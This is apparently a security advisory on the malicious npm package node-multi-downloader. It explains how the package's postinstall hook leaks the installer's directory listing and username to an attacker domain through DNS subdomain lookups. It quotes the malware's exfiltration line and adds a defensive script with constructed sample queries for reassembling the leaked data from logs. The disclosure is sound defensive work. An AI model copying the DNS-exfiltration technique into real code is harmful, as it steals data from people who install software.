Malicious package

node-multi-downloader (npm)

Malicious code in node-multi-downloader (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5735
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall node-multi-downloader

What this malware does

On npm install, this package's postinstall hook (node index.js) hex-encodes the installer's current working directory, the first 15 entries of that directory, and os.userInfo().username, and leaks each chunk via DNS A-record lookups to subdomains of the attacker-controlled domain uqlyosvp1f9.oob.evilsec.xyz. The hardcoded out-of-band domain is bound at index.js line 1 (const D = "uqlyosvp1f9.oob.evilsec.xyz"), and index.js line 8 calls dns.resolve(`${chunk}.${tag}${i}.${D}`, 'A', ...) to transmit the encoded data. DNS-subdomain encoding is a well-known technique to evade HTTP egress filtering. The package metadata (description "RSI package!", anonymous author, release-candidate version) provides no legitimate purpose that would justify reading the installer's filesystem and identity at install time.
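
Added example, not code from the package or from this advisory's publisher: for incident response, this Node.js script takes DNS query names from resolver logs, keeps those under the out-of-band domain named above, and reassembles the hex chunks to show what was leaked. The sample queries are constructed, and the tag letters "c" and "u", along with the assumption that a tag does not end in a digit, are hypothetical because the advisory does not list the tag values.

```javascript
// Added example: reassemble what the postinstall hook leaked, from DNS logs.
const OOB_DOMAIN = "uqlyosvp1f9.oob.evilsec.xyz"; // IoC from the advisory

// Constructed sample query names. The tags "c" and "u" are hypothetical;
// the advisory gives only the shape <chunk>.<tag><i>.<domain>.
const SAMPLE_QUERIES = [
  "registry.npmjs.org.",                            // unrelated lookup
  "63692f617070.c1.uqlyosvp1f9.oob.evilsec.xyz.",   // logged out of order
  "2F686F6D652F.c0.UQLYOSVP1F9.oob.evilsec.xyz",    // mixed case in the log
  "63692f617070.c1.uqlyosvp1f9.oob.evilsec.xyz",    // resolver retry
  "6275696c646572.u0.uqlyosvp1f9.oob.evilsec.xyz",
  "not-hex.c2.uqlyosvp1f9.oob.evilsec.xyz",         // hit, but not decodable
];

function decodeExfil(queryNames, domain = OOB_DOMAIN) {
  const suffix = "." + domain.toLowerCase();
  const streams = new Map(); // tag -> Map(index -> hex chunk)
  const unparsed = [];       // queries under the domain that did not decode
  for (const raw of queryNames) {
    // DNS names are case-insensitive and logs may keep the trailing dot.
    const name = raw.trim().toLowerCase().replace(/\.$/, "");
    if (!name.endsWith(suffix)) continue;
    const labels = name.slice(0, -suffix.length).split(".");
    // Assumption: the tag is the part of the label before the trailing digits.
    const m = labels.length === 2 ? /^(.*?)(\d+)$/.exec(labels[1]) : null;
    if (!m || !/^([0-9a-f]{2})+$/.test(labels[0])) {
      unparsed.push(raw);
      continue;
    }
    if (!streams.has(m[1])) streams.set(m[1], new Map());
    streams.get(m[1]).set(Number(m[2]), labels[0]); // retries collapse here
  }
  const decoded = {};
  for (const [tag, chunks] of streams) {
    const order = [...chunks.keys()].sort((a, b) => a - b);
    const hex = order.map((i) => chunks.get(i)).join("");
    decoded[tag] = Buffer.from(hex, "hex").toString("utf8");
  }
  return { decoded, unparsed };
}

console.log(decodeExfil(SAMPLE_QUERIES));
```

Any query under the domain, decodable or not, indicates the hook ran on that host, so entries returned in unparsed still count as hits.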

Malicious versions

1 flagged
5.0.14-rc.3

Indicators of compromise (SHA-256)

77464387879005e5c35e332c1b9f9826ea1af7dec30cad7d06fe1023d553f1f4
8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68

Frequently asked questions

No. node-multi-downloader on npm has been identified as a malicious package (version 5.0.14-rc.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006322, IN-MAL-2026-006321

Credits

  • Amazon Inspector · finder

node-multi-downloader (npm) malicious package — MAL-2026-5735 | O3 Security